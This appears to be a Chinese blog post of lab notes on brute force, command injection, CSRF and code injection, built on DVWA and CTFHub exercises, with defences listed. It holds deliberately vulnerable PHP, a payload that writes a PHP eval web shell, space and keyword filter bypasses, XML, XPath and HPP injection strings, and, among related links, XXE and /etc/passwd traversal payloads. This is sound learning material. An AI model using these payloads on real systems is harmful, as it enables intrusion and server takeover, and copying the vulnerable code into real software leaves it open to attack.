暴力破解&命令注入&CSRF&代码注入

最新推荐文章于 2024-04-14 09:48:05 发布
最新推荐文章于 2024-04-14 09:48:05 发布
阅读量716 收藏 4
点赞数
分类专栏: 漏洞 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51911432/article/details/113487648
版权

暴力破解

burp攻击类型“Attack type"

Sniper :狙击手,可以指定多个变量同时进行破解,但只设置一个字典文件,将指定的变量挨个用字典内容进行替换。
Battering ram:攻城锤,可以指定多个变量,但仍只设置一个字典文件,将所有的变量一起用字典内容进行替换。
Ptichfork:草叉子,可以指定多个变量,但需要为每个变量分别设置一个字典文件,然后用对应的字典内容对变量同时进行替换。
Cluster bomb:集束炸弹,指定多个变量,并为每个变量分别设置一个字典文件;然后用字典内容组合对变量进行替换。

载荷类型“Payload type”

Simple list:可以手动添加字典列表,也可导入burp自带的字典,也可自定义的字典。
Runtime file :只能加载自定义的字典。
Numbers:设定一个数值范围,从范围内依次或随机取值进行测试。
Brute forcer:自己定义字符范围来生成字典文件。

impossible

直接看impossible
如果密码输入错误,就需要等待15分钟才可以继续输入。
防御暴力破解的最有效方法是在登录页面中加入验证码。

<?php

if( isset( $_POST[ 'Login' ] ) && isset ($_POST['username']) && isset ($_POST['password']) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_POST[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_POST[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Default values
    $total_failed_login = 3;
    $lockout_time       = 15;
    $account_locked     = false;

    // Check the database (Check user information)
    $data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // Check to see if the user has been locked out.
    if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) )  {
        // User locked out.  Note, using this method would allow for user enumeration!
        //echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>";

        // Calculate when the user would be allowed to login again
        $last_login = strtotime( $row[ 'last_login' ] );
        $timeout    = $last_login + ($lockout_time * 60);
        $timenow    = time();

        /*
        print "The last login was: " . date ("h:i:s", $last_login) . "<br />";
        print "The timenow is: " . date ("h:i:s", $timenow) . "<br />";
        print "The timeout is: " . date ("h:i:s", $timeout) . "<br />";
        */

        // Check to see if enough time has passed, if it hasn't locked the account
        if( $timenow < $timeout ) {
            $account_locked = true;
            // print "The account is locked<br />";
        }
    }

    // Check the database (if username matches the password)
    $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR);
    $data->bindParam( ':password', $pass, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // If its a valid login...
    if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
        // Get users details
        $avatar       = $row[ 'avatar' ];
        $failed_login = $row[ 'failed_login' ];
        $last_login   = $row[ 'last_login' ];

        // Login successful
        echo "<p>Welcome to the password protected area <em>{$user}</em></p>";
        echo "<img src=\"{$avatar}\" />";

        // Had the account been locked out since last login?
        if( $failed_login >= $total_failed_login ) {
            echo "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";
            echo "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>";
        }

        // Reset bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    } else {
        // Login failed
        sleep( rand( 2, 4 ) );

        // Give the user some feedback
        echo "<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";

        // Update bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    }

    // Set the last login time
    $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

命令注入漏洞(Command Injection)

漏洞产生原因:
在Web程序中,因为业务功能需求要通过web前端传递参数到后台服务器上执行(特别是一些网络设备的Web管理界面),但由于开发人员没科对输入进行产格的过滤,导致攻击者可以构造一些额外的“带有非法目的”命令,欺骗后台服务器执行。
漏洞危害:
如果web应用使用的是root权限,则该漏洞可以导致攻击者在服务器上执行任意命令。

符号

"|”:前面命令输出结果作为后面命令的输入内容;
"&”:前面命令执行后接着执行后面的命令;
"Il”:前面命令执行失败的时候才执行后面的命令;
”&&”:前面命令执行成功了才执行后面的命令。
Linux系统还可以使用分号(;)同时执行多条命令。
还可以使用重定向(>)在服务器中生成文件,或是使用(<)从事先准备好的文件读入命令等。
(1)、ls:列出当前目录下的文件
(2)、cat:打开指定的文件

low

shell_exec
127.0.0.1 | echo <?php eval($_POST['a']); ?> >c:\1.php
stristr() 函数搜索字符串在另一字符串中的第一次出现

<?php
if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];
    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }
    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}
?>

medium

多了这些

    // Set blacklist
    $substitutions = array(
        '&&' => '',
        ';'  => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

high

没什么区别多加了些黑名单

    // Set blacklist
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

impossible.

is number限制

<?php
if( isset( $_POST[ 'Submit' ]  ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $target = $_REQUEST[ 'ip' ];
    $target = stripslashes( $target );

    // Split the IP into 4 octects
    $octet = explode( ".", $target );

    // Check IF each octet is an integer
    if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
        // If all 4 octets are int's put the IP back together.
        $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];

        // Determine OS and execute the ping command.
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            // Windows
            $cmd = shell_exec( 'ping  ' . $target );
        }
        else {
            // *nix
            $cmd = shell_exec( 'ping  -c 4 ' . $target );
        }

        // Feedback for the end user
        echo "<pre>{$cmd}</pre>";
    }
    else {
        // Ops. Let the user name theres a mistake
        echo '<pre>ERROR: You have entered an invalid IP.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

ctfhub命令注入

无过滤

127.0.0.1;ls
127.0.0.1;cat 文件名在f12也可以看到
在这里插入图片描述

127.0.0.1;cat 文件名 | base 64

<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    $cmd = "ping -c 4 {$_GET['ip']}";
    exec($cmd, $res);
}
?>

过滤cat

cat 由第一行开始显示内容,并将所有内容输出
tac 从最后一行倒序显示内容,并将所有内容输出
tail 只显示最后几行
nl 类似于cat -n,显示时输出行号
tailf 类似于tail -f
more 根据窗口大小,一页一页的现实文件内容
less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head 只显示头几行

过滤空格

使用IFS$9、%09”、<、>、<>、{,}、%20、${IFS}来代替空格

<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/ /", $ip, $m)) {//过滤操作
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

过滤目录分割符

屏蔽了\但还有cd

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/\//", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

过滤运算符

看源码屏蔽了这个 |
file | base64也可以写成base64 file

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/(\||\&)/", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

综合过滤练习

过滤了,|,&,;, ,/,cat,flag,ctfhub
空格可以用${IFS}
cat可以用more
flag可以用正则f*,但不能用_因为后面还有个_
在linux下,命令分隔符除了;还有%0a

常见防范措施

1.对传入的命令进行严格过滤;
**EscapeShellCmd()**图数
把字符串中所有可能瞒过shell而去执行另外一个命令的字符转义,如管道符(|)、分号(; )、重定向(>)、从文件读入(<)等。
**EscapeShellArg()**函数
在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串就可以安全地作为命令的参数。
2.在后台对应用的权限进行控制(可以给PHP建立独的账号,控制 PHP 的启动权限)。

跨站请求伪造

CSRF攻击的实施前提
目标网站存在CSRF漏洞。
受害者需要保持目标站点的登录活动状态。
受害者需要点击钓鱼链接。

钓鱼

生成短链接
CSRF与XSS结合
将CSRF代码写入XSS注入点 ,更有隐蔽性,不会出现密码修改界面

low


<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );//加密

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

medium

$_SERVER在服务器上的信息
验证HTTP_REFERER


<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

HIGH

<?php
if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

IMPOSSIBLE

二次确认或者设置二维码

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_curr = $_GET[ 'password_current' ];
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Sanitise current password input
    $pass_curr = stripslashes( $pass_curr );
    $pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_curr = md5( $pass_curr );

    // Check that the current password is correct
    $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
    $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
    $data->execute();

    // Do both new passwords match and does the current password match the user?
    if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
        // It does!
        $pass_new = stripslashes( $pass_new );
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update database with new password
        $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
        $data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
        $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
        $data->execute();

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match or current password incorrect.</pre>";
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

防御预防CSRF

1.二次确认
设置验证码,在进行敏感操作时进行密码输入验证
2.Token认证

逻辑错误漏洞

挖掘漏洞

1.发现功能模块如:修改密码,找回密码修改个人信息
2.对业务流程或http拦截

绕过授权认证

水平越权,垂直越权,密码找回漏洞,支付漏洞

代码注入

XML注入

eg

<?xml version="1.0" encoding="UTF-8"?>
<manager>
	<admin id="1">
		<name>admin</name>
	</admin>
</manager>

若攻击者知道password字段,插入

admin</password><admin id="2"><name>hack</name><password>hacker</password></admin>

即可创建新管理
修复漏洞就是对预定义字符进行转义 大于>小于<,& ’ "

XPATH注入

XPath就是用路径表达式

eg

<?xml version="1.0" encoding="UTF-8"?>
<manager>
	<admin id="1">
		<username>admin</username>
		<password>admin123</password>
	</admin>
</manager>
//user[username/text()='admin' and password/text()='admin123'
//查询

可以食用 or 1=1 遍历全部
防御也就是转义预定义字符

JSON注入

eg

key->value类似py的字典
{ “UserName”: “xxswe” }
如果向JSON注入恶意字符将会解析失败。
JSON根据引号(”)冒号(:)逗号(,)花括号({})
防御任然是转义

HTTP paramter pollution

简称HPP,HTTP 参数污染
&可以传入不同的参数 str=1&str=2&str=3结果str=1或3在不同语言和环境中是不一样的
hpp可绕过web引用防火墙
WAF在脚本还未收到请求前就开始对数据进行校验,若未发现问题就交给脚本处理,反之将拦截。
但问题在与不同的脚本读取位置不同,例
New.php?id=1&id=select username,password from admin–
WAF读取1,而php读取后者
ASP.net:news.aspx?id=1;id=s&id=e&id=l&id=e&id=c&id=t
而asp会将其连接在一起,HPP可能会绕过某些防火墙

URL跳转与钓鱼

跳转

<% response.sendRedirect("x.jsp")%>

利用URL躲过检测,如 http://www.baidu.com/page?=http://www.taobao.com
php重定向

<?php 
$url=$_GET['url']
header("Location: $url");
?>
Pvr1sC
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
命令执行+CSRF
06-11
1. **OS命令执行**:当程序使用用户输入构建系统命令时,若未进行过滤或转义,攻击者可以插入恶意代码,导致服务器执行非预期的操作,例如下载恶意文件、修改系统配置或删除重要数据。 2. **Struts2远程命令执行**...
前段缓存以及xss csrf sql注入
weixin_45346239的博客
07-01 189
前段缓存以及xss csrf sql注入
DVWA系列(二)——使用Burpsuite进行Command Injection(命令注入
橘子女侠
04-29 3060
1. Command Injection简介 (1)命令执行概念 命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围内;PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一;就好比说一句话木马<?php @eval($_POST['cmd']);?> (2)分类 代码过滤不严或无过滤; 系统漏洞造成的命令执行,bash破壳漏洞,该漏洞可以构...
CSRF漏洞初解
最新发布
LS_Sy的博客
04-14 808
CSRF(Cross-Site Request Forgery)漏洞是一种Web应用程序安全漏洞,也被称为"One-Click Attack"或"Session Riding"。它利用了Web应用程序对用户在其他网站上已经验证过的身份的信任,通过伪装请求来执行非授权的操作可以通俗的理解为:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。
最近总结出来的一种万能暴力破解
qq_25355771的博客
07-11 359
最近刷了不少题,很庆幸自己可以通过写博客的方式来写笔记,这样方便以后自己不断地复习。最近突发奇想,由于很多的问题都是转化为数组来进行操作的。如字符串的一些问题,我们经常看到 的一些代码,直接将一串字符串组转换成字符串数组,说明字符串数组对于字符串的解题是十分重要的。 那么 ,有没有一种万能的暴力破解法可以解决数组里面的一些问题(比如:求最长公共子串问题,最长的字符串长度问题等等)。下面我总结了一点自己的想法:...
Python实现压缩包密码暴力破解脚本(附代码
winkexin的博客
06-26 5706
print("破解成功,密码是:" + pas)print("破解成功,密码是:" + pas)print("破解成功,密码是" + pas)print(f"检测到字典里有{len(ozd)}个密码")print("破解失败")print("检测到是zip压缩包")print("检测到是rar压缩包")print("正在破解.....")print("正在破解.....")print("检测到是7z压缩包")print("正在破解.....")print("破解失败")print("破解失败")
一文了解暴力破解
allintao的博客
02-28 407
暴力破解,是一种针对于密码的破译方法,将密码进行逐个推算直到找出真正的密码为止。例如一个已知是四位并且全部由数字组成的密码,其可能共有10000种组合,因此最多尝试10000次就能找到正确的密码。而当遇到人为设置密码(非随机密码,人为设置密码有规律可循)的场景,则可以使用密码字典(例如彩虹表)查找高频密码,破解时间大大缩短。 设置长而复杂的密码、在不同的地方使用不同的密码、避免使用个人信息作为密码、定期修改密码等是防御暴力破解的有效方法。
Yii框架防止sql注入,xss攻击与csrf攻击的方法
10-21
主要介绍了Yii框架防止sql注入,xss攻击与csrf攻击的方法,结合实例形式分析了Yii框架针对sql注入,xss攻击与csrf攻击的防范方法与相关函数调用注意事项,需要的朋友可以参考下
360提供的php防sql注入代码修改类
05-02
本文将深入探讨360提供的PHP防SQL注入代码修改类,以及如何通过此类来防范这两种攻击。 一、SQL注入 SQL注入是一种利用网站应用程序的漏洞,通过输入恶意SQL语句来控制数据库的攻击手段。攻击者可以获取、修改、...
360通用asp防护代码(防sql注入)
09-29
360通用ASP防护代码旨在解决这个问题,防止SQL注入和跨站攻击,提高网站的安全性。 SQL注入防护主要涉及以下几点: 1. **输入验证**:对用户提交的数据进行严格的检查,例如限制特殊字符、长度检查和类型检查。360...
python暴力破解代码
热门推荐
10-16 11万+
MySQL 数据库暴力破解代码 ··· -- coding: utf-8 -- import pymysql success = False f_user = open(‘username.txt’, ‘r’) f_pwd = open(‘password.txt’, ‘r’) lines_user = f_user.readlines() #读取出来是一个列表 lines_pwd = f_pw...
暴力破解代码
09-11
如果你下了,你不会后悔的,该代码还是有一定的逻辑结构值得你我分享的。
语言源代码密码暴力破解
08-17
语言源代码密码暴力破解
暴力破解密码的代码
12-24
暴力破解密码的程序,学习如何操作其他窗口,尤其是那些忘记密码的。
php暴力破解代码
04-21
php暴力破解代码
DVWA-多个工具及python代码实现暴力破解登录
nex1less的博客
07-19 2244
前言现在那个DVWA里的Brute Force都已经烂大街了,那么今天我们就来演示一下如何从登录页面暴力破解进去 0x01.python代码: 1.在浏览器找到dvwa登录页面 2.我们尝试提交数据: 发现点击登录之后url上依然是login.php,并且出现login failed 提示 由此我们确定此页面的http请求方式为post 3.打开Burpsuite并...
Python代码实现凯撒密码的暴力解密(循环)
qq_35677929的博客
09-20 956
Python代码实现凯撒密码的暴力解密(循环)
Python 暴力破解密码字典生成代码,轻便,少占资源
wanghb221的博客
11-13 1050
本文对之前的密码生成的itertools.produc 和字典文件方法做了改进,可以用较小的负担完成。
超级简陋的暴力破解程序
weixin_49324123的博客
07-29 853
客户端 #include<iostream> #include<Windows.h> #include<string> using namespace std; int main() { string pwd; while(1){ cout << "please input your password:"; cin>>pwd; if(pwd == "000123"){ break; }else{ cout<&.
Python实现web漏洞扫描功能,漏洞包括:xss漏洞、SQL注入、XXE漏洞、文件包含漏洞、文件上传漏洞、文件下载漏洞、CSRF漏洞等, 功能包括:基础的IP扫描、端口扫描、暴力破解、后台扫描、域名扫描等,每扫描出一个漏洞,输出漏洞信息
06-11
实现这样的功能需要使用一些第三方库和工具,比如:requests、BeautifulSoup、sqlmap、lxml、pycurl等。以下是一个简单的Python代码示例,可以实现基本的web漏洞扫描功能: ```python import requests from bs4 import BeautifulSoup import re # 定义一个检查XSS漏洞的函数 def check_xss(url): payload = '<script>alert("XSS");</script>' r = requests.get(url + payload) if payload in r.text: print("[+] XSS Vulnerability Detected: " + url) # 定义一个检查SQL注入漏洞的函数 def check_sql_injection(url): payload = "'" r = requests.get(url + payload) if "error in your SQL syntax" in r.text: print("[+] SQL Injection Vulnerability Detected: " + url) # 定义一个检查XXE漏洞的函数 def check_xxe(url): payload = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>' r = requests.post(url, data=payload) if "root:" in r.text: print("[+] XXE Vulnerability Detected: " + url) # 定义一个检查文件包含漏洞的函数 def check_file_inclusion(url): payload = "../../../../../../etc/passwd" r = requests.get(url + payload) if "root:" in r.text: print("[+] File Inclusion Vulnerability Detected: " + url) # 定义一个检查文件上传漏洞的函数 def check_file_upload(url): files = {'file': open('test.php', 'rb')} r = requests.post(url, files=files) if "uploaded successfully" in r.text: print("[+] File Upload Vulnerability Detected: " + url) # 定义一个检查文件下载漏洞的函数 def check_file_download(url): r = requests.get(url) filename = re.findall("filename=(.+)", r.headers['Content-Disposition'])[0] if len(filename) > 0: print("[+] File Download Vulnerability Detected: " + url) # 定义一个检查CSRF漏洞的函数 def check_csrf(url): r = requests.get(url) soup = BeautifulSoup(r.text, 'lxml') csrf_token = soup.find('input', {'name': 'csrf_token'})['value'] payload = {'csrf_token': csrf_token, 'action': 'delete'} r = requests.post(url, data=payload) if "deleted successfully" in r.text: print("[+] CSRF Vulnerability Detected: " + url) # 定义一个扫描URL的函数,调用以上函数进行漏洞检测 def scan_url(url): check_xss(url) check_sql_injection(url) check_xxe(url) check_file_inclusion(url) check_file_upload(url) check_file_download(url) check_csrf(url) # 测试 scan_url("http://example.com/index.php") ``` 以上代码只是一个简单的示例,实际上要实现完整的web漏洞扫描功能需要考虑很多因素,比如:多线程扫描、自动化漏洞利用、漏洞报告生成等。因此,如果您需要进行严格的web漏洞扫描,请使用专业的web安全测试工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值